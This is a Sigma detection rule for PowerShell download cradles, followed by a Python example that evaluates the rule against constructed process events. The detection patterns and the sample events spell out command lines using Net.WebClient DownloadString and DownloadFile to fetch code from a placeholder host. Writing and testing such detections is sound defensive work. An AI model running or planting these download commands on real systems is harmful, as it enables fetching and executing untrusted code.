PowerShell Download Pattern

Detects a PowerShell process whose command line contains download commands

Sigma rule

title: PowerShell Download Pattern
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
related:
    - id: e6c54d94-498c-4562-a37c-b469d8e9a275
      type: derived
    - id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
      type: obsolete
status: test
description: Detects a Powershell process that contains download commands in its command line string
references:
    - https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html
    - https://lab52.io/blog/winter-vivern-all-summer/
    - https://hatching.io/blog/powershell-analysis/
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2019-01-16
modified: 2025-10-20
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - 'new-object'
            - 'net.webclient).'
            - 'download'
        CommandLine|contains:
            - 'string('
            - 'file('
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
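The detection block above is a boolean expression over three process_creation fields. As an added example (not part of the rule or of the SigmaHQ project), the Python below applies that logic to a handful of constructed events, reproducing the Sigma semantics that matter here: list items under a selection are ORed, keys within a selection are ANDed, `contains` and `endswith` compare case-insensitively, and `all of selection_*` ANDs the two selections. The events, paths and the `example.invalid` host are constructed sample data, not real telemetry.

```python
# Added example: evaluate this Sigma rule's detection logic over sample
# process_creation events, the way a compiled SIEM query would.
# Not part of the rule or the SigmaHQ project.

# Values copied from the rule's detection block.
IMAGE_SUFFIXES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILE_NAMES = ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")
CLI_CONTAINS_ALL = ("new-object", "net.webclient).", "download")
CLI_CONTAINS_ANY = ("string(", "file(")


def matches_selection_img(event):
    """selection_img: the two list items are ORed.
    Image|endswith and a plain OriginalFileName equality; Sigma string
    matching is case-insensitive by default, so everything is lowercased."""
    image = event.get("Image", "").lower()
    ofn = event.get("OriginalFileName", "").lower()
    return (any(image.endswith(s.lower()) for s in IMAGE_SUFFIXES)
            or any(ofn == n.lower() for n in ORIGINAL_FILE_NAMES))


def matches_selection_cli(event):
    """selection_cli: the two map keys are ANDed.
    contains|all needs every substring; plain contains needs at least one."""
    cli = event.get("CommandLine", "").lower()
    return (all(s in cli for s in CLI_CONTAINS_ALL)
            and any(s in cli for s in CLI_CONTAINS_ANY))


def rule_matches(event):
    """condition: all of selection_*"""
    return matches_selection_img(event) and matches_selection_cli(event)


def evaluate(events):
    """Return one boolean per event, in input order."""
    return [rule_matches(e) for e in events]


# Constructed sample events (field names follow the Sigma process_creation
# taxonomy). Expected: [True, True, False, False, False]
SAMPLE_EVENTS = [
    {   # the pattern the rule is written for
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -c \"(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/x.ps1')\"",
    },
    {   # renamed binary: Image does not match, OriginalFileName still does
        "Image": r"C:\Users\Public\updater.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "updater.exe -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('http://example.invalid/a.bin', 'a.bin')\"",
    },
    {   # same strings echoed by cmd.exe: selection_img fails
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c echo (New-Object Net.WebClient).DownloadString(",
    },
    {   # ordinary script execution: selection_cli fails
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
    {   # a download via a different cmdlet is outside this rule's scope
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": "pwsh.exe -c \"Invoke-WebRequest -Uri "
                       "https://example.invalid/report.csv -OutFile report.csv\"",
    },
]

if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("MATCH  " if hit else "no hit ", event["CommandLine"])
```

The second event is the reason the rule keys on OriginalFileName as well as Image: a copied or renamed PowerShell binary keeps its PE version resource, so the selection still fires. The last event shows the rule's deliberately narrow scope, which is why its `falsepositives` can stay at "Unknown" and its level at medium; when tuning for an environment, feed matching events from a known-good baseline through `evaluate` and add exclusions only for the command lines you can account for.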
